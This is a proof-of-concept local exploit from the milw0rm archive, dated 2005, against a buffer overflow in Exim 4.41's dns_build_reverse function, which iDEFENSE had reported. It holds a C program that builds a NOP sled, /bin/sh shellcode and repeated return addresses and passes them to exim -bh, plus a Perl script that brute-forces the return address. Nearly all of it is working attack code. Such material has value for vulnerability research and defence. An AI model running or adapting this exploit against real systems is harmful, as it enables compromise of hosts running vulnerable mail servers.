1 /*
2 This proof−of−concept demonstrates the existence of the vulnerability
3 reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
4 It has been tested against exim−4.41 under Debian GNU/Linux.
5 Note that setuid () is not included in the shellcode to avoid
6 script−kidding.
7 My RET is 0xbffffae4, but fb.pl can brute−force it for you.
8
9 −−−−−−−−−−−
10 Brute Force fb.pl:
11 −−−−−−−−−−−
12
13 #!/usr/bin/perl
14
15 $cnt = 0xbffffa10;
16
17 while (1) {
18 $hex = sprintf ("0x%x", $cnt);
19 $res = system ("./exploit $hex");
20 printf "$hex : $res\n";
21 $cnt += 4;
22 }
23
24 −−−−−−−−−
25 exploit.c:
26 −−−−−−−−−
27 */
28
29 #define NOP 0x90
30 #define TAMBUF 368
31 #define INIC_SH 20
32 #include <stdlib.h>
33
34 int main (int argc, char **argv) {
35
36 static char shellcode[]=
37 "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
38 "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
39 "\x2f\x73\x68\x58";
40
41 char buffer [TAMBUF + 1];
42 char cadena [TAMBUF + 5];
43 int cont;
44 unsigned long ret = strtoul (argv[1], NULL, 16);
45
46 for (cont = 0; cont < TAMBUF / 4; cont++)
47 *( (long *) buffer + cont) = ret;
48
49 for (cont = 0; cont < strlen (shellcode); cont++)
50 buffer [cont + INIC_SH] = shellcode [cont];
51
52 for (cont = 0; cont < INIC_SH; cont++)
Page 1/2
Exim 4.41 dns_build_reverse Local Exploit PoC
Rafael Carrasco
01/15/2005
53 buffer [cont] = NOP;
54
55 buffer [TAMBUF] = 0;
56 printf ("RET = 0x%x\n", ret);
57 strcpy (cadena, "::%A");
58 strcat (cadena, buffer);
59 execl ("/usr/sbin/exim", "./exim", "−bh", cadena, (char *) 0);
60 }
61
62 // milw0rm.com [2005−01−15]
Page 2/2
Exim 4.41 dns_build_reverse Local Exploit PoC
Rafael Carrasco
01/15/2005